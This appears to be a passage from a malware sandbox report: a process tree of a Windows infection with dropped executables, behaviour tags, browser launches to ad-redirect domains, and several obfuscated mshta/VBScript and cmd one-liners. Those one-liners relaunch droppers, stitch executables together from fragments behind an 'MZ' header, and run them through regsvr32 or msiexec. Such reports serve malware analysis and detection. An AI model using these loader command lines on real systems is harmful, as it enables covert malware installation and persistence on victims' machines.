"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f74718
14⤵
PID:7320

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
13⤵
PID:7416

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f74718
14⤵
PID:1560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
13⤵
PID:8464

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f74718
14⤵
PID:10228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=3
13⤵
PID:2052

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f74718
14⤵
PID:4056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=3
13⤵
PID:8520

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f74718
14⤵
PID:6980

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1339680
13⤵
PID:6120

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ff870f746f8,0x7ff870f74708,0x7ff870f74718
14⤵
PID:6792

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1620783&var=3
13⤵
PID:5284

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f74718
14⤵
PID:2944

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1343178
13⤵
PID:8764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f74718
14⤵
PID:5756

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=465
13⤵
PID:8260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xdc,0x104,0x108,0x100,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f74718
14⤵
PID:6732

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=466
13⤵
PID:5960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0xdc,0x7ff870f746f8,0x7ff870f74708,0x7ff870f74718
14⤵
PID:10016

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
13⤵
PID:5488

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f74718
14⤵
PID:1200

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
13⤵
PID:5784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f74718
14⤵
PID:7472

C:\Users\Admin\Pictures\Adobe Films\adF6KxjhcOfjYh4ost48IawU.exe
"C:\Users\Admin\Pictures\Adobe Films\adF6KxjhcOfjYh4ost48IawU.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:6064

C:\Users\Admin\Pictures\Adobe Films\XOi6C0Ymdh5PqNsTC3JWe2Yq.exe
"C:\Users\Admin\Pictures\Adobe Films\XOi6C0Ymdh5PqNsTC3JWe2Yq.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6040

C:\Users\Admin\Pictures\Adobe Films\XOi6C0Ymdh5PqNsTC3JWe2Yq.exe
"C:\Users\Admin\Pictures\Adobe Films\XOi6C0Ymdh5PqNsTC3JWe2Yq.exe"
8⤵
PID:6552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6552 -s 200
9⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3984

C:\Users\Admin\Pictures\Adobe Films\JmrC_y7ZqnosVrDZc7UTR80C.exe
"C:\Users\Admin\Pictures\Adobe Films\JmrC_y7ZqnosVrDZc7UTR80C.exe"
7⤵
- Executes dropped EXE
PID:6032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 276
8⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4376

C:\Users\Admin\Pictures\Adobe Films\Gav9xdYNZl8Zb_Q49AqR0WeW.exe
"C:\Users\Admin\Pictures\Adobe Films\Gav9xdYNZl8Zb_Q49AqR0WeW.exe"
7⤵
- Executes dropped EXE
PID:5980

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon17afe24e0084db3.exe
5⤵
PID:2264

C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17afe24e0084db3.exe
Mon17afe24e0084db3.exe
6⤵
- Executes dropped EXE
PID:4824

C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17afe24e0084db3.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17afe24e0084db3.exe" -u
7⤵
- Executes dropped EXE
PID:3600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon1727c156c4abcec.exe
5⤵
PID:5024

C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon1727c156c4abcec.exe
Mon1727c156c4abcec.exe
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3216

C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon1727c156c4abcec.exe
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon1727c156c4abcec.exe
7⤵
- Executes dropped EXE
PID:4832

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon17332e41e6b.exe
5⤵
PID:2808

C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17332e41e6b.exe
Mon17332e41e6b.exe
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:720

C:\Users\Admin\AppData\Roaming\3354555.exe
"C:\Users\Admin\AppData\Roaming\3354555.exe"
7⤵
- Executes dropped EXE
PID:4276

C:\Users\Admin\AppData\Roaming\238072.exe
"C:\Users\Admin\AppData\Roaming\238072.exe"
7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1692

C:\Users\Admin\AppData\Roaming\8326766.exe
"C:\Users\Admin\AppData\Roaming\8326766.exe"
7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5556

C:\Users\Admin\AppData\Roaming\3515439.exe
"C:\Users\Admin\AppData\Roaming\3515439.exe"
7⤵
- Executes dropped EXE
PID:5752

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\3515439.exe"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """"== """" for %T in ( ""C:\Users\Admin\AppData\Roaming\3515439.exe"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )
8⤵
PID:5424

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\3515439.exe" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""== "" for %T in ( "C:\Users\Admin\AppData\Roaming\3515439.exe") do taskkill /im "%~nxT" /f
9⤵
PID:6856

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "3515439.exe" /f
10⤵
- Kills process with taskkill
PID:6644

C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE
LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj
10⤵
PID:6844

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""/ptCSVoYGd9AYAP_3p6Sjuyj ""== """" for %T in ( ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )
11⤵
PID:6296

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "/ptCSVoYGd9AYAP_3p6Sjuyj "== "" for %T in ( "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE") do taskkill /im "%~nxT" /f
12⤵
PID:3080

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCrIPt: cLOsE (cREAteoBject ( "wscRIPT.SHELl"). Run ( "C:\Windows\system32\cmd.exe /q /r ECho L%Time%07> 2B_LH.IT & EcHO | SEt /P = ""MZ"" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt +WL4sXR.MY +JkOFKWNK.Eo7 + 2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S " ,0 ,TRUe ) )
11⤵
PID:6908

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /r ECho L%Time> 2B_LH.IT & EcHO | SEt /P = "MZ" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt +WL4sXR.MY+JkOFKWNK.Eo7 +2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S
12⤵
PID:6896

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>RqS~WQ.qCt"
13⤵
PID:6444

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHO "
13⤵
PID:5368

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 .\BgG1KXA.y -U -S
13⤵
PID:6600

C:\Users\Admin\AppData\Roaming\1702062.exe
"C:\Users\Admin\AppData\Roaming\1702062.exe"
7⤵
- Adds Run key to start application
PID:5336

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
8⤵
- Suspicious behavior: SetClipboardViewer
PID:5900

C:\Users\Admin\AppData\Roaming\3270715.exe
"C:\Users\Admin\AppData\Roaming\3270715.exe"
7⤵
PID:5396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon174a6c5f1664f.exe
5⤵
PID:3684

C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon174a6c5f1664f.exe
Mon174a6c5f1664f.exe
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1596

C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon174a6c5f1664f.exe
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon174a6c5f1664f.exe
7⤵
- Executes dropped EXE
PID:2844

C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon174a6c5f1664f.exe
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon174a6c5f1664f.exe
7⤵
- Executes dropped EXE
PID:2264

C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon174a6c5f1664f.exe
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon174a6c5f1664f.exe
7⤵
- Executes dropped EXE
PID:408

C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon174a6c5f1664f.exe
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon174a6c5f1664f.exe
7⤵
- Executes dropped EXE
PID:5164

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon17a0d8ec302e.exe
5⤵
PID:3988

C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17a0d8ec302e.exe
Mon17a0d8ec302e.exe
6⤵
- Executes dropped EXE
PID:1460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 284
7⤵
- Program crash
- Enumerates system info in registry
PID:7044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon178d8e5d06822.exe
5⤵
PID:3676

C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon178d8e5d06822.exe
Mon178d8e5d06822.exe
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1260

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
7⤵
PID:572

C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4788

C:\Users\Admin\AppData\Roaming\7496090.exe
"C:\Users\Admin\AppData\Roaming\7496090.exe"
9⤵
PID:4448

C:\Users\Admin\AppData\Roaming\3518046.exe
"C:\Users\Admin\AppData\Roaming\3518046.exe"
9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6360

C:\Users\Admin\AppData\Roaming\1714730.exe
"C:\Users\Admin\AppData\Roaming\1714730.exe"
9⤵
PID:6992

C:\Users\Admin\AppData\Roaming\5676460.exe
"C:\Users\Admin\AppData\Roaming\5676460.exe"
9⤵
PID:6324

C:\Users\Admin\AppData\Roaming\6175967.exe
"C:\Users\Admin\AppData\Roaming\6175967.exe"
9⤵
PID:6252

C:\Users\Admin\AppData\Roaming\8931098.exe
"C:\Users\Admin\AppData\Roaming\8931098.exe"
9⤵
PID:6320

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\8931098.exe"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """"== """" for %T in ( ""C:\Users\Admin\AppData\Roaming\8931098.exe"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )
10⤵
PID:5468

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\8931098.exe" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""== "" for %T in ( "C:\Users\Admin\AppData\Roaming\8931098.exe") do taskkill /im "%~nxT" /f
11⤵
PID:6428

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
12⤵
- Executes dropped EXE
PID:5836

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "8931098.exe" /f
12⤵
- Kills process with taskkill
PID:5432

C:\Users\Admin\AppData\Local\Temp\inst1.exe
"C:\Users\Admin\AppData\Local\Temp\inst1.exe"
8⤵
- Executes dropped EXE
PID:3260

C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe
"C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"
8⤵
- Executes dropped EXE
PID:5148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 280
9⤵
- Program crash
PID:5812

C:\Users\Admin\AppData\Local\Temp\chrome.exe
"C:\Users\Admin\AppData\Local\Temp\chrome.exe"
8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5544

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5544 -s 1704
9⤵
- Program crash
PID:6676

C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
8⤵
- Executes dropped EXE
PID:5276

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
8⤵
PID:5564

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
9⤵
PID:5392

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
10⤵
PID:7088

C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
11⤵
PID:6488

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
12⤵
PID:7148

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
13⤵
PID:3288

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
12⤵
PID:6280

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
13⤵
PID:6344

